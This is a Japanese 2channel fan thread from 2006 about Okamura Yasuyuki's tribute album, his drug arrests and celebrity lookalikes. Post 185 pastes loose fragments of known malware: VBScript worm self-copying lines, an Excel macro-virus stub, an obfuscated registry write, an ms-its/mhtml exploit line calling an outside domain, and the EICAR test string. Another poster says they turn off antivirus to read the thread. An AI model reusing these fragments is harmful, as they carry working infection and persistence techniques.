やっぱ岡村ちゃんは自分で作った歌を歌ったほうがいいね。当たり前かw
尾崎ファンには悪いけど、ちょっと詩の世界が自分は苦手だ。
一晩中失望と戦った…ってなんか…

165 :伝説の名無しさん:2006/07/15(土) 01:01:04
間違えた。スマソ。
○ 一晩中絶望と戦った
× 一晩中失望と戦った

166 :伝説の名無しさん:2006/07/15(土) 01:12:00
太陽の破片か…曲以前に岡村ちゃんの高音の出なさ加減にいたたまれなくなって全然聴いてねぇや

曲自体も岡村ちゃんの曲に比べて平凡な感じがしないでもないし

逆に岡村靖幸トリビュートアルバムはどうなんだ?
Amazonのレビュー読んでも賛否両論が極端過ぎてイマイチ参考にならん…

167 :伝説の名無しさん:2006/07/15(土) 01:28:15
くるりが好き

168 :伝説の名無しさん:2006/07/15(土) 01:43:14
御本尊のアクが強いので、トリビュートはやりにくかったかもなぁ。
無難にまとめても、ぶち壊しても、どちらもしっくりこないというか。

個人的には、お色気系(?)楽曲に挑戦するアーティストがいなかった
のが残念だった。



169 :伝説の名無しさん:2006/07/15(土) 01:46:48
自分も岡村トリビュートはいまいちだったな。
結局ほとんど聞いてないし
でも尾崎の方に比べて参加アーティストがいまいち無名の人が多かったよね
シカオとかには依頼したのに断られたらしいけど、なんでだろ?

170 :伝説の名無しさん:2006/07/15(土) 03:46:40
出したレーベルがマイナーだったからじゃない?
尾崎はソニーだったからね。

171 :伝説の名無しさん:2006/07/15(土) 08:10:45
>>169
シカオに依頼したのか
どうせならシカオに家庭教師カバーして欲しかったなぁ…
アニメのタイアップとかジャニの仕事はひょこひょこ引き受けるくせに
シカオ許すまじ

172 :伝説の名無しさん:2006/07/15(土) 10:36:14
本当に岡村ちゃん好きな人ほど、安易にトリビュートに参加するより
岡村ちゃん本人の活躍を待ちたい、とか思ってそうじゃね?>シカオ
でもトリビュートはトリビュートで好きだよ。イルリメ以外は。

お色気系はミッチーが「聖書」やってるけど、全然薄味だった。

173 :伝説の名無しさん:2006/07/15(土) 11:22:12
ミッチーのBIBLEはいまいちだった

174 :169:2006/07/15(土) 11:34:31
>>171
シカオは早々と不参加表明したらしい。
他にも平井賢やチャラ、奥田民生などにも、ことごとく断られたみたい。
シカオや民生が歌ったの聞いてみたかったなぁ。

一応、↓にソース貼っておきますね。

http://www.geocities.co.jp/Broadway-Guitar/3137/asahi10.html


175 :伝説の名無しさん:2006/07/15(土) 11:54:45
小山田が断わったってのが納得いかん

176 :伝説の名無しさん:2006/07/15(土) 12:33:31
酉と最初の逮捕ってどっちが先だったっけ?

177 :伝説の名無しさん:2006/07/15(土) 12:59:21
たぶん、逮捕の方が後じゃないの?
断った理由が金や契約でないのなら、なんだったんだろう?

個人的に思うのは、裏声を駆使する岡村のカバーは男性だと難しいと思うんだけどね。
世界観が強烈でやりにくいのもあると思うし。
カバーしてけなされたら面白くないだろうし。

178 :伝説の名無しさん:2006/07/15(土) 15:37:40
トリビュートというと、キャリアが一段落ついてある程度の評価が確定した
アーティスト(語弊がある言い方だと思うが「過去の人」)に対して敬意を表
するといったイメージが強い。

その意味から考えれば、岡村はまだ現役であると判断したアーティストも
中にはいるのではないかと思う。

と、好意的に解釈w



179 :伝説の名無しさん:2006/07/15(土) 16:24:13
>>174
奥田民生にも依頼来てたのか…シカオと民生両方好きなアーティストだから残念だな
つうか民生はスピッツのトリビュートには参加してたんだがなぁ…うーむ
世界観が違すぎるから岡村ちゃんの方は断ったんかもな。スピッツは近いものがあるけど
しかし他アーティストが岡村ちゃんの曲歌ってるのは想像できん

第二弾出るときには断ったアーティストも参加して欲しいな
でもぶっちゃけ第二弾出るのは岡村ちゃんの死後な気がする…長生きしなそうな感じだし…
こんな事書いたら当然反論とかお叱りのレスとか出てくるよな…不謹慎でごめん。

180 :伝説の名無しさん:2006/07/15(土) 16:45:20
>>173
及川ってそもそも歌上手いか?
この前やってた昼ドラの主題歌で及川歌ってるの聴いたけど、岡村ちゃんとは比べものにならねぇ

何でこの両者ってよく並べられるんだろ。ナルシストキャラも岡村ちゃんと方向性というか、何かが違うのに

181 :伝説の名無しさん:2006/07/15(土) 20:03:37
ミッチーはCDだといまいち

182 :伝説の名無しさん:2006/07/15(土) 22:38:06
イルリメイラネ
逆から呼んでも
イルリメイラネ

183 : :2006/07/15(土) 22:55:42
いつになるか分からない復活ライブのセットリストを妄想

(基本的には全部弾き語り)

@はじめて

ASweet Memories

Bベイベェ即興演奏(約20分)

C友人のふり

Dカルアミルク

立ち上がってアコギを抱える

Dロングシュート(ホームシックバージョン)

Eイケナイコトカイ

アンコール

@渾身の新曲(弾き語り)

再びアコギを抱えて

AOut of Blue

・・・

184 :伝説の名無しさん:2006/07/15(土) 22:59:13
Eイケナイコトカイ のあたりで目に見えてグッタリしてる
アンコールでは見違えたかのようにハイテンション
客が不安になる

185 :伝説の名無しさん:2006/07/15(土) 23:12:16
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

186 :伝説の名無しさん:2006/07/16(日) 01:09:51
変なもん貼るなよ !

187 :伝説の名無しさん:2006/07/17(月) 01:50:27
>>185
くわしく

188 :伝説の名無しさん:2006/07/17(月) 03:01:48
>>187
ウイルス

189 :伝説の名無しさん:2006/07/17(月) 10:31:50
ウイルスそこら辺のスレに貼られまくってるけど、パソの人は何か影響あったん?
ウイルス貼られてから人少なくなった気がするから
運営は何も処置してくれないんかね

190 :伝説の名無しさん:2006/07/17(月) 12:41:01
>>183
ほとんど、客が歌う、だいすきも追加しておいてちょうだい。

191 :伝説の名無しさん:2006/07/17(月) 13:40:13
これってノートン先生だけ反応するコードじゃないの?

192 :伝説の名無しさん:2006/07/17(月) 14:20:59
ノートン入れてるとトロイの木馬が出てくるけど、
特にパソには悪影響ないみたいだから大丈夫だと思う。
自分は仕方ないから、このスレ見る時だけはノートンを無効に設定してる。

話戻るけど、出所して又音楽やろうと思った時
きっと力になってくれる人がいるだろうってなんとなく思ってたけど、
トリビュート断られた話聞くと難しいかもね…前途多難かな…




193 :伝説の名無しさん:2006/07/17(月) 16:03:40
トリビュート断られた理由が、岡村ちゃんの世界観や音楽性を表現するのは難しいとか
岡村ちゃんを「過去の人」にしたくないとかいうプラスの方向だったらいいんだけど、
ただ単に岡村ちゃんの曲に対してさして思い入れが無いとか、
インデックスレーベルからのリリースだから金の問題とか
ただ単に面倒だとか(特に民生がそういう感じかも)
そういう裏事情的な理由もある気がする

194 :伝説の名無しさん:2006/07/17(月) 16:23:21
裏事情あるかもね、色々と圧力がかかったとか?複雑な事情がありそう。
表面的にはそういう事はおおっぴらにしないだろうけど。
マイナーなレーベルからじゃなかったら違ってたような。。
桜井さんやソフィアの松岡には依頼しなかったのかな?

桜井さんなんか
bank bandでカルアミルク歌ってる位なんだから
曲に対しての思い入れは強いと思うし、引き受けてくれたんじゃないかって気もするけど


195 :伝説の名無しさん:2006/07/17(月) 16:31:00
トリビュートってされる側よりも知名度が低い人たちがやる物なんじゃないの?

民生なんか今更そんなの参加して好きでしたアピールしたって何のメリットもないでしょ
ファンなら知ってる事だろうし。
好きなら好きで桜井の様に自身のアルバムの中ででも歌ってりゃいい話だし

196 :伝説の名無しさん:2006/07/17(月) 16:38:46
そうなの?
でも尾崎のトリビュートもそうだけど、スピッツのトリビュートなんかは
松任谷由美や椎名林檎なんかのメジャーな人が参加してるよね


197 :伝説の名無しさん:2006/07/17(月) 16:54:07
>>196
そうそう、スピッツのトリビュートには大物参加してるのに
岡村ちゃんトリビュートには参加してない不思議

198 :伝説の名無しさん:2006/07/17(月) 17:13:49
スピッツは売れてるし現役だったじゃん・・・

それに比べて岡村ちゃんは一般的に十分過去の遺物でしょう
トリビュートの時点では。
しかも完全に忘れ去られているという・・・
GAOとか大事マンレベル

199 :伝説の名無しさん:2006/07/17(月) 17:22:46
>>198
それを言っちゃあおしまいよあーた

岡村ちゃんが家庭教師以降バリバリ活動してたとしたら、
岡村ちゃんの知名度とか、日本の音楽界は変わってたんかなと考えてみた
或いは逆に表舞台に出て来なくなったからこそ待望論が出て、
今日まで存在が忘れ去られることがなかったのかもな

200 :伝説の名無しさん:2006/07/17(月) 17:23:17
たまとか

201 :伝説の名無しさん:2006/07/17(月) 17:45:26
スピッツねぇ。。。俺には犬の名前くらいにしか思えないんだけど。
結局、セールスのいきそうなトリビュートに名の売れた奴らがちまちま集まって、
マニアックな岡村には集まらないってことだろうな。

日本じゃ小学生が聴くようなのしか売れないから仕方がないんだろうな。。。

202 :伝説の名無しさん:2006/07/17(月) 17:50:38
まぁ、あとレコード会社もデカいとこだしなスピッツは
スピッツトリビュートに人が集まるのは仕方ない
売れなきゃど〜しよ〜もなぁ〜いでしょ〜
でもあんまりそういう事言ってると中二病患者扱いされますよw

203 :伝説の名無しさん:2006/07/17(月) 17:55:27
ビジネスですからね。

岡村ちゃんの周りには金の匂いすらしなそう。。

204 :伝説の名無しさん:2006/07/17(月) 18:08:32
岡村ちゃんのまわりにはお風呂入らない人の香り(におい)がただよってそう

205 :伝説の名無しさん:2006/07/17(月) 18:11:53
>>198
GAOとか大事マンレベルって事はないでしょ。
あの人達ってシングル1曲売れただけの一発屋じゃんw

岡村ちゃんはシングルよりもアルバムが売れるタイプのアーティストだし、
全く違うと思う

206 :伝説の名無しさん:2006/07/17(月) 18:16:52
>>205
あんまり大差ないと思うけどなー
「だいすき」の一発屋でしょ?って人も多いと思うぞ

207 :伝説の名無しさん:2006/07/17(月) 18:20:29
つーか「誰それ?」って人が多い気が
知ってる人は猛烈に知ってるが知らない人は名前すら聞き覚えがないって感じ

208 :伝説の名無しさん:2006/07/17(月) 18:29:07
>>206
大差ないって事はないんじゃないかな?
岡村ちゃんはライブやれば固定ファンだって付いてるから
昔ほどじゃないにしても人も結構集まるし、

他のアーティストのプロデュースとかもしてるし
第一セールス云々より、音楽的な才能が全く違うと思うんだけどなぁ

209 :伝説の名無しさん:2006/07/17(月) 18:46:29
だから才能の事を言ってるんではなく、世間一般の認識の事ですよ。

動く金レベルや現役感でスピッツ寄りかGAO寄りかっつったらGAOだろと言う事


GAOを引き合いに出すのもちょっとアレかと思うが
他に懐かし系が浮かばなかったんだよ(゚听)

210 :伝説の名無しさん:2006/07/17(月) 18:57:32
一般的には大江千里くらいかな?大江千里も最近出てないし…

211 :伝説の名無しさん:2006/07/17(月) 19:09:03
千里みたいに定期的に活動してて人気なくなってったのとはまた違う気がする

212 :伝説の名無しさん:2006/07/17(月) 19:11:57
GAOとか大事マンって例えがちょっと。。
才能あるんだけど出てないって意味なら、
小沢健二あたりに例えるなら納得するんだけど

213 :伝説の名無しさん:2006/07/17(月) 19:12:44
松岡英明でいっか

214 :伝説の名無しさん:2006/07/17(月) 19:13:17
こんなに活動してないのに未だに新規ファンがついたり、
話題に上ったりするアーティストも珍しいと思う

215 :伝説の名無しさん:2006/07/17(月) 19:26:10
>>209
動く金レベルで言っても、GAOレベルって事はないと思う
大百科だって完売したし(オクには出てるけど)、
そういう企画が出る事じたい、ある程度セールスが見込めるからだろうし
GAO大百科はもし出ても売れないだろうからね

216 :伝説の名無しさん:2006/07/17(月) 21:18:14
まーあれです

トリビュートに一人も大物がいないのを圧力?音楽性?なぜなぜ?
スピッツや尾崎のには参加してるのにーって言ってるので、
単に過去の人過ぎ+金にならない+話題性もイマイチでメリットなし
(むしろあの時点で再犯の可能性もあってリスキー)
って理由もあるんじゃないのという事を言いたかっただけです。
スピッツと同じ商品価値があるとでも?と。

実際出来上がったメンツは仕事がなさそうな人たちばかりに見えますし。

217 :伝説の名無しさん:2006/07/17(月) 21:26:55
>スピッツと同じ商品価値があるとでも?と。↑これは岡村ちゃんのトリビュートに価値が無いって言いたいのか?

実際出来上がったメンツは仕事がなさそうな人たちばかりに見えますし。
↑どっちのトリビュートについて言ってんの?

218 :伝説の名無しさん:2006/07/17(月) 21:33:29
>これは岡村ちゃんのトリビュートに価値が無いって言いたいのか?
スピッツその他売れてる人たちと比較すれば無い方だろうという事です

>どっちのトリビュートについて言ってんの?
岡村ちゃんの方です 主観ですが。

219 :伝説の名無しさん:2006/07/17(月) 21:38:19
>(むしろあの時点で再犯の可能性もあってリスキー)

これ読んで、ドラッグの件が一番ネックだったんじゃないかという気がしてきた。
本人たちがトリビュート参加したくても、事務所的に一番やってほしくない仕事
というか、本当にリスキーなのは金銭よりこっちじゃない?
シカオやタミオ、スピッツなんかの大きい事務所は、すでにやばい匂いをあの当時
察知してたのかもよ。


220 :伝説の名無しさん:2006/07/17(月) 21:46:09
>>218
そうなんだよな、岡村ちゃんのトリビュートに参加したメンツを見れば
そんなに売れてない奴らが久し振りの仕事にありついた感がありありなんだよな
悲しくなるから敢えて言わなかったんだけどww

ドラッグとかは関係ない気がするがな。たとえ岡村ちゃんからそういう危ない匂いがしていたとしても
トリビュートに参加したってそのアーティストにはデメリットはないだろうよ

221 :伝説の名無しさん:2006/07/17(月) 21:48:09
>>219
そうかもしれないですね。
せっかく曲作ってレコーディングして何だかんだと頑張っても
本人がまた捕まってしまえば全て無駄になるんですから。

それが大物ともなればそのトリビュートに費やした時間で他の仕事を出来る訳じゃないですか
そしたらその損失は何百万何千万という単位かもしれない訳ですよ

そりゃシカオだって断りたくなるでしょう

222 :伝説の名無しさん:2006/07/17(月) 21:52:12
>>221
あ、なるほど。そういう危険があったのか
でも何でもドラッグと結びつけて解釈するのもなんだかなぁ、という気もするけど

223 :伝説の名無しさん:2006/07/17(月) 21:55:14
朝日美穂がせめて一人でも大物を引っ張ってこれればねぇ…

224 :伝説の名無しさん:2006/07/17(月) 22:00:31
ぶっちゃけ朝日自体知名度が低い…

もし岡村ちゃんのトリビュートを企画した奴がミスチル桜井とかで
リリースするレコード会社もメジャーなところだったら
ものっそい大物が集まったと思うんだが

225 :伝説の名無しさん:2006/07/17(月) 22:13:52
みホミホマコトがおるやん!q

226 :伝説の名無しさん:2006/07/17(月) 22:59:23
>>216
>むしろあの時点で再犯の可能性もあってリスキー

でも岡村トリビュートのリリースって初犯で逮捕される前なんだから
あの時点では、再犯の可能性なんて考えてなかったはずじゃない?

>スピッツと同じ商品価値があるとでも?と。

売り上げ的には確かにスピッツには及ばないだろうし、
そういう意味では同じ商品価値があるとは思ってない
だからと言ってGAOレベルって事はないでしょ。

>金にならない

それはあるかもね。
実際岡村トリビュートに参加するより、
カトゥーンに曲書いたほうが比べ物にならないほどお金になるだろうし。

でも、そういうトリビュートに参加するのって
お金よりもアーティストへの気持ちなんじゃないかと思ってたんだけど、
違うのかな?やっぱお金なのかな?

227 :伝説の名無しさん:2006/07/17(月) 23:20:57
>>226
人それぞれだけど今回はそんな情熱だけで参加をした「大物」はいなかったね、という話

>>175-197あたりの発言を受けての書き込みであって
そういう考え方は無いのか?と言いたいだけ

228 :伝説の名無しさん:2006/07/17(月) 23:30:44
そういうことよりも、カーネーションの直枝さんと朝日美穂が中心に
なって企画したからじゃない?
二人の人脈からセレクトしただけって気がする。
民生やスガが断ったというのはどうも・・・声かけてないんじゃないかな。
民生はARBをはじめとしてトリビュート盤に結構参加してるからね。

229 :伝説の名無しさん:2006/07/17(月) 23:31:21
SPITZと岡村ちゃんの売り上げを比べたら、靖幸ちゃんなんて紙屑だぜ

230 :伝説の名無しさん:2006/07/17(月) 23:38:40
大物の人こそ、お金とか話題性だとかで動いたりしないと思うけど…
一流の大物アーティストが自分へのメリットどうこうで
参加する、しないを決めたりするものかな?
自分的には色々な事情があったからじゃないかと勝手に思ってるけど

231 :伝説の名無しさん:2006/07/17(月) 23:42:19
大物アーティストはそんな必死にならなくても余裕あるからね
無名アーティストは金銭的な面や話題性が気になるだろうけど


232 :伝説の名無しさん:2006/07/18(火) 00:13:55
>>228
そうなんだよな、民生は矢沢トリビュートにもスピッツトリビュートにも
真心ブラザーズのにも井上陽水のやつにも
とにかくトリビュートには参加しまくってる人だから、岡村ちゃんのだけ断るって不自然だと思うんだよ
朝日と民生の事務所の疎通がとれてなかったんじゃないんかと勝手に推測

233 :伝説の名無しさん:2006/07/18(火) 00:16:08
ならよくミスチルのパクライはカルアミルクカバーしたな

234 :伝説の名無しさん:2006/07/18(火) 00:21:33
あ、そういや桜井のカルアミルクは未聴だ
あの声と歌い方でカルアミルク歌われたらなんかクドくなりそうだが
実際どんなんだろ

235 :伝説の名無しさん:2006/07/18(火) 00:29:46
朝日が声をかけたアーティストは三十組を越えるだろう。
最初に声をかけたスガさんをはじめ、奥田民生、チャラ、平井賢といった大物から、
比較的、身近なコーネリアスやエゴ・ラッピンやユー・ザ・ロックなどなど、
たくさんのアーティストに断られもした。
しかし、お金の問題や契約上の問題で実現しなかったということはない。
要はアーティスト自身の参加意思があったかないか。

http://www.geocities.co.jp/Broadway-Guitar/3137/asahi10.html


この記事もあって今の話題になったはずだが。

236 :伝説の名無しさん:2006/07/18(火) 01:38:14
つんくがイケナイコトカイをカバー…
ねちっこい…

237 :伝説の名無しさん:2006/07/18(火) 01:40:05
不参加アーティストがひっかかった事情はそれぞれ違えど、その事情を
乗り越えるだけの情熱が岡村トリビュートに対しては沸かなかったことだ
けは共通だろう。

トリビュートに関しては物足りないという意見も多い訳だが、岡村の復帰
に向けての一つのきっかけとなったであろうという意味において、価値の
あることだったと思う。




238 :伝説の名無しさん:2006/07/18(火) 01:41:39
>>236
聴いたのか
確かにあの声でイケナイコトカイはクドいと思う
聴いてないけど

239 :伝説の名無しさん:2006/07/18(火) 01:43:51
>>237
じゃあ出所後第2弾を出せば復帰の足掛かりにはなりそうだが
今度のは大物集めてさ

240 :伝説の名無しさん:2006/07/18(火) 02:05:48
>>239

現状から考えれば、大物はますます参加しないだろう。
また、今までの言動から推測される岡村の性格から考えて、
トリビュート企画は有難迷惑な話と感じてもおかしくない。

出所後に関しては、本人のやる気といかに周りに良いスタッフ
を集められるかどうかとしか言いようが無い。

なんのかんの言っても、多くのファンが求めているのは、
やはり本人名義の作品だよ。

と、マジレスしてみる。



241 :伝説の名無しさん:2006/07/18(火) 02:10:00
そらぁそうだけど、いきなり本人が出してもセールス的にどうなの?みたいな

それはそれとしてもやっぱロキノンにかかってるな
ロキノンには岡村ちゃんプッシュ頑張っていただきたい

242 :伝説の名無しさん:2006/07/18(火) 02:16:45
>>241

セールス的には、推定される固定ファン層の数だけ売れればさしあたり
十分だろう。2003年の復帰後はそういう状態だったし。

問題は、今回の一件で離れたファンがどれだけいるかだな。
岡村の音楽の魅力は、ある意味“麻薬”だからねw

243 :伝説の名無しさん:2006/07/18(火) 08:18:08
ほんと岡村ちゃんの音楽は中毒性があるね、なんなんだろう?
他のアーティストの曲はすぐ飽きるのに、
岡村ちゃんのは飽きるどころか、聞けば聞くほどヤミツキになる

244 :伝説の名無しさん:2006/07/18(火) 13:31:11
>>240
確かに出所後は本人のやる気と
周りに良いスタッフが集められるか?にかかってると思うけど、実際どうなんだろ

二度薬をやってるとなると敬遠するレコード会社や業界の人も多いだろうし
もし今度再犯したら、それこそ予定が全てキャンセルになって大きな損害になる訳だから
岡村ちゃんと契約するのは躊躇するだろう

CD発売すればある程度セールスがあると思ってもリスクが大き過ぎるからな

245 :伝説の名無しさん:2006/07/18(火) 13:59:00
マキシマムザ亮君に似てる

246 :伝説の名無しさん:2006/07/18(火) 14:50:15
そういう時は画像を貼れ

http://www.vap.co.jp/1129/omake/images/wall800x600.jpg

247 :伝説の名無しさん:2006/07/18(火) 15:02:11
なんで岡村ファンって業界っぽい口調の人が多いのか?
言ってる事はどうやらど素人と同レベルらしいのに。

248 :伝説の名無しさん:2006/07/18(火) 15:13:42
まぁそんなにカリカリしなさんな

249 :伝説の名無しさん:2006/07/18(火) 16:16:57
では、普通の口調で中身のある面白い意見を書き込んで下さい。

>1ね。分かってる。
もう書き込まないから勘弁してね。

250 :伝説の名無しさん:2006/07/18(火) 16:35:10
2chなんて雑談みたいな書き込みが普通でしょ?更年期障害ですか?

251 :伝説の名無しさん:2006/07/18(火) 17:07:33
>>247, >>249, >>250>>1

252 :伝説の名無しさん:2006/07/18(火) 17:18:55
>>246
うん、似てないね



どれが亮君だか知らんが

253 :伝説の名無しさん:2006/07/18(火) 17:46:07
いつもの煽りぼうやが来ました

254 :伝説の名無しさん:2006/07/18(火) 18:00:54
>>253
自己紹介乙
>>1

255 :伝説の名無しさん:2006/07/18(火) 18:01:57
んのぉう〜ほおぅ〜おぅ〜お SeXッッ

ttp://pie.bbspink.com/test/read.cgi/girls/1152026640/l50

256 :伝説の名無しさん:2006/07/18(火) 18:19:07
>>246
じゃ、コレ
ttp://aploda.org/dl.php?mode=pass&file_id=0000004688.jpg

257 :伝説の名無しさん:2006/07/18(火) 19:32:51
おぉ、似てる

258 :伝説の名無しさん:2006/07/18(火) 19:56:04
似てる

そして汚い

259 :伝説の名無しさん:2006/07/18(火) 20:15:24
キムタクが似てるはずだったんじゃないのぉ〜♪

260 :伝説の名無しさん:2006/07/18(火) 21:02:57
岡村靖幸の、自称似ているといわれる芸能人。

コロッケ、石橋貴明、杉本彩

261 :伝説の名無しさん:2006/07/18(火) 21:07:41
杉本には納得
後の二人は微妙だな…あ、口開けてにやっと笑ったときの頬の辺りが似てるかも

262 :伝説の名無しさん:2006/07/18(火) 21:10:01
長州小力だろ

263 :256:2006/07/18(火) 21:15:45
まぁ、似てるカットを選んでるのだけどね。
実際には似て無い様だけど、小汚い雰囲気とイッちゃってる感じがステージとか
表立った場所では無いトコで悪魔が降臨している時の岡村を思い出させたんだ。

264 :伝説の名無しさん:2006/07/18(火) 21:24:41
>>263は岡村ちゃんの何なのさw

265 :伝説の名無しさん:2006/07/18(火) 21:53:45
不細工に写るとコロッケだな

266 :伝説の名無しさん:2006/07/18(火) 22:07:25
写り悪い写真なんて見たことないけどなぁ

267 :伝説の名無しさん:2006/07/18(火) 22:19:29
そりゃ、写真は本人がチェックして気に入ったものしか使わせないからね。
禁生の頃はかなり過敏になってて、写真撮影すら殆ど出来なかった様だし。
真禁生パンフの中で太っているのを隠すため必要以上に頬をすぼめている
写真は気持ち悪かった。

268 :伝説の名無しさん:2006/07/18(火) 23:21:40
早熟のジャケットはコロッケのちあきなおみ

269 :伝説の名無しさん:2006/07/19(水) 00:09:19
ドメインokamurayasuyuki.comの有効期限は06/8/15の様です
果たして更新されるか・・・

270 :伝説の名無しさん:2006/07/19(水) 00:35:36
更新されたら、吉本とはまだ切れてないということなのかな?

吉本といえば、極楽とんぼの山本が不祥事でクビになったな。

271 :伝説の名無しさん:2006/07/19(水) 01:52:42
ついにやったか
山本デブ

272 :伝説の名無しさん:2006/07/19(水) 06:11:26
何をやったの?
山本デフジャム

273 :伝説の名無しさん:2006/07/19(水) 07:46:38
ジャニーズの赤西くんって言う人、岡村さんに似てますね

274 :伝説の名無しさん:2006/07/19(水) 07:54:53
17才の子と飲酒と淫行したんだって。さっきテレビでやってた

275 :伝説の名無しさん:2006/07/19(水) 07:59:42
>>273
えぇぇぇ〜似てないと思う。だって赤西ってかなりカッコいいじゃん。

276 :伝説の名無しさん:2006/07/19(水) 16:05:13
岡村靖幸ファンってジャニヲタ多いんか?

277 :伝説の名無しさん:2006/07/19(水) 16:43:26
多くないよ、近眼と老眼が多いらしいけど

278 :276:2006/07/19(水) 16:51:44
あ、俺近眼だわwww

279 :伝説の名無しさん:2006/07/19(水) 17:33:16
あ〜ジャニのお遊戯うぜ

280 :275:2006/07/19(水) 18:30:38
赤西カッコいいと書いた者ですが、別にジャニオタじゃないですよw
カッコいいとは思いますが、全く興味ありません!!

281 :伝説の名無しさん:2006/07/19(水) 22:15:30
相撲の雅山って岡村ぽくね?

282 :伝説の名無しさん:2006/07/19(水) 22:25:50
>>281
いじけた口元とかそっくりだな。

283 :伝説の名無しさん:2006/07/19(水) 22:25:52
うp

284 :伝説の名無しさん:2006/07/19(水) 22:26:34
河豚、又はマンボウに似ている

285 :伝説の名無しさん:2006/07/19(水) 22:31:12
岡村ちゃんって、目開いてるときと細目になってるときの顔の印象かなり違くないか?
家庭教師のLIVEビデオで家庭教師歌ってる時の顔と
寸劇のときの顔がかなり違って見えるんだが

286 :伝説の名無しさん:2006/07/20(木) 00:07:49
整形?

287 :伝説の名無しさん:2006/07/20(木) 00:35:18
青年15才   _,,..,,,,_
        ./ ,' 3 `ヽーっ
        l   ⊃ ⌒_つ
         `'ー---‐'''''"

児童9才    _,,..,,,,_
        ./ ,' 3 `ヽっ
        l   ⊃ _つ
         `'ー--‐'''"

幼児3才    ,,,,,,_
        /,' 3 `っ
        !,,,,c,,,.っ

乳児1才     ,,,,_
         /,'3 `っ
         `‐‐‐'

生後9ヶ月   _,,,,.
         〈,'3 `3
         `''''"

生後3ヶ月   (,'3 `3
         `'''"

誕生直後   (,'3`3

胎児       (:3っ

胚        L

288 :伝説の名無しさん:2006/07/20(木) 01:04:19
青年14才だろうよ
と敢えてツッコんでおく

289 :伝説の名無しさん:2006/07/20(木) 02:40:47
吉本解雇になったデブつながりで「岡村と山本」結成!

290 :伝説の名無しさん:2006/07/20(木) 02:41:39
元がこういうAAなのを承知で青年15才って事で岡村スレに貼ったんだろう
ツッコミどころが違うよw

291 :伝説の名無しさん:2006/07/20(木) 02:42:25
>>289
こういうツマンナイ奴っているよねー

292 :伝説の名無しさん:2006/07/20(木) 02:53:27
動けるデブつながりだろ

293 :伝説の名無しさん:2006/07/20(木) 04:02:22
巨体を駆使して動けるデブだぞ(笑)

294 :伝説の名無しさん:2006/07/20(木) 08:21:13
吉本の不祥事一覧みたいなとこにやっさんの事故と並んで岡村ちゃんのあの事件が載ってた。


295 :伝説の名無しさん:2006/07/20(木) 08:27:19
山本と同類にされるのは腑に落ちないな
山本は人を傷付けたけど岡村ちゃんは自分自身を傷付けた
まぁ犯罪は犯罪って言われればそれまでだけどな

296 :伝説の名無しさん:2006/07/20(木) 11:20:19
岡村は頑張ってくれてたスタッフを傷付けたって事で

297 :伝説の名無しさん:2006/07/20(木) 23:01:18
ファンを傷つけた とか言ってみた

298 :伝説の名無しさん:2006/07/21(金) 00:07:21
彼女も傷つけていた

299 :伝説の名無しさん:2006/07/21(金) 00:32:58
岡村ちゃんに彼女なんていません><

300 :伝説の名無しさん:2006/07/21(金) 00:40:29
ババァ乙

301 :伝説の名無しさん:2006/07/21(金) 00:44:25
300ゲトズサー
 ̄ ̄V ̄ ̄ ̄ ̄ ̄
  ∧ ∧
⊂(゚Д゚⊂⌒^つ≡3



…って、>>300(´・ω・`)ぬっころすぞ

302 :伝説の名無しさん:2006/07/21(金) 17:28:22
302ゲトズサー
 ̄ ̄V ̄ ̄ ̄ ̄ ̄
  ∧ ∧
⊂(゚Д゚⊂⌒^つ≡3

303 :伝説の名無しさん:2006/07/22(土) 13:32:10
 

304 :伝説の名無しさん:2006/07/22(土) 17:28:21
みんな〜元気かぁ?

305 :伝説の名無しさん:2006/07/22(土) 17:42:32
ジジィ乙

306 :伝説の名無しさん:2006/07/22(土) 18:09:56
そんな事言わずに何か話そうぜ〜

307 :伝説の名無しさん:2006/07/22(土) 18:25:37
弓道部から何やら聞こえてくる
よくよく耳を澄ますと・・・

薬中〜

308 :伝説の名無しさん:2006/07/22(土) 18:58:45
もう薬関係の話は飽きたよ

309 :伝説の名無しさん:2006/07/22(土) 21:07:15
聖書(YO・GO・RE Version)
http://www.youtube.com/watch?v=X6a24Oxgj2s

310 :伝説の名無しさん:2006/07/22(土) 21:25:07
>>309

コイツ何者w

バイブルのBGMは、既存のお笑い映像に後付かな。
惜しむらくは、ラストの「フォー」に合わせてYO・GO・SHIて欲しかったww

311 :伝説の名無しさん:2006/07/22(土) 22:15:14
そうそう14回もしょげずにさ

312 :伝説の名無しさん:2006/07/22(土) 22:23:37
ホントのダンスチャンスロマンスは自分次第だっぜ

313 :伝説の名無しさん:2006/07/23(日) 12:40:12
you tubeのいいとも出演した時のを見ようとしたら、5個のうち、
4つめが見れないんだけど、みんなのパソでは見れるの?
別に削除された訳じゃなさそうだし。。


314 :伝説の名無しさん:2006/07/24(月) 00:33:52
見れるよ。
岡村のヤローがタモのサングラス奪い気味に取っ頭に乗せた時のだろ?

315 :313:2006/07/24(月) 01:18:08
>>314
本当?
タモリのサングラス頭に乗っけた時のかどうかは
